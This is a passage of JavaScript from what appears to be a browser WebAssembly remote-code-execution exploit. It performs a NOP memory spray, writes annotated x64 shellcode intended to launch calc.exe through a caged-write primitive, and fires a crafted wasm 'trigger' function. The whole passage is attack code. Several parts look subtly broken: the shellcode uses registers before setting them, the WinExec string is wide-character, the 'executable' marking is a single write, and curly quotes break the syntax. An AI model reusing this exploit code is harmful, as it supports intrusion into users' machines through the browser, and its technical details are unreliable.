// Memory spray and shellcode
appendLog(‘Spraying memory…’);
const spray = new Uint8Array(0x10000);
for (let i = 0; i < spray.length; i += 8) {
new DataView(spray.buffer, i).setUint32(0, 0x90909090, true);
}
// x64 shellcode: Launch calc.exe
const shellcode = new Uint8Array([
0x48, 0x83, 0xEC, 0x28, // sub rsp, 0x28
0x48, 0x31, 0xC9, // xor rcx, rcx
0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, // mov rax, gs:[0x60]
0x48, 0x8B, 0x40, 0x18, // mov rax, [rax+0x18]
0x48, 0x8B, 0x40, 0x10, // mov rax, [rax+0x10]
0x48, 0x8B, 0x00, // mov rax, [rax]
0x48, 0x8B, 0x00, // mov rax, [rax]
0x48, 0x8B, 0x58, 0x30, // mov rbx, [rax+0x30]
0x4C, 0x8B, 0x4B, 0x18, // mov r9, [rbx+0x18]
0x45, 0x8B, 0x41, 0x20, // mov r8d, [r9+0x20]
0x4D, 0x8B, 0x08, // mov r9, [r8]
0x4D, 0x8B, 0x09, // mov r9, [r9]
0x41, 0x8B, 0x49, 0x3C, // mov ecx, [r9+0x3C]
0x4C, 0x01, 0xC9, // add rcx, r9
0x8B, 0x81, 0x88, 0x00, 0x00, 0x00, // mov eax, [rcx+0x88]
0x4C, 0x01, 0xC8, // add rax, r9
0x44, 0x8B, 0x40, 0x20, // mov r8d, [rax+0x20]
0x4C, 0x01, 0xC8, // add rax, r9
0x8B, 0x48, 0x24, // mov ecx, [rax+0x24]
0x4C, 0x01, 0xC9, // add rcx, r9
0x44, 0x8B, 0x40, 0x1C, // mov r8d, [rax+0x1C]
0x4C, 0x01, 0xC8, // add rax, r9
0x8B, 0x14, 0x0A, // mov edx, [rdx+rcx]
0x41, 0x8B, 0x14, 0x90, // mov edx, [r8+rdx*4]
0x4C, 0x01, 0xCA, // add rdx, r9
0x48, 0x83, 0xEC, 0x20, // sub rsp, 0x20
0x48, 0x8D, 0x0D, 0x10, 0x00, 0x00, 0x00, // lea rcx, [cmd]
0x6A, 0x05, // push 5 (SW_SHOW)
0xFF, 0xD2, // call rdx (WinExec)
0xC3, // ret
// Command: "calc.exe"
0x63, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x63, 0x00, 0x2E, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x00, 0x00
]);
// Write shellcode with retry
appendLog('Writing shellcode...');
for (let i = 0; i < shellcode.length; i++) {
try {
module.instance.exports.small_caged_write(i, shellcode[i]);
await new Promise(resolve => setTimeout(resolve, 1));
} catch (e) {
appendLog(‘Shellcode write failed at offset ‘ + i + ‘: ‘ + e.message);
throw e;
}
}
// Mark memory executable
appendLog(‘Marking memory as executable…’);
try {
module.instance.exports.small_caged_write(0, 0x2000);
} catch (e) {
appendLog(‘Memory marking failed: ‘ + e.message);
throw e;
}
// Trigger RCE
appendLog(‘Triggering RCE – spawning calc.exe…’);
const trigger = builder.addFunction(‘trigger’, builder.addType(kSig_v_v));
builder.addBody([
0x23, g_arr,
…wasmI32Const(0),
0xFC, 0x28, t0_nonnull,
0x0B
]);
builder.exportAs(‘trigger’, ‘function’, trigger);
// Instantiate module
const wasmBytes = builder.toArrayBuffer();
module = await WebAssembly.instantiate(wasmBytes);
module.instance.exports.init_g_arr(0x1000);
module.instance.exports.trigger();
appendLog(‘Exploit completed successfully.’);
} catch (e) {
appendLog(‘Exploit attempt failed: ‘ + e.message);
throw e;
}
return module;
}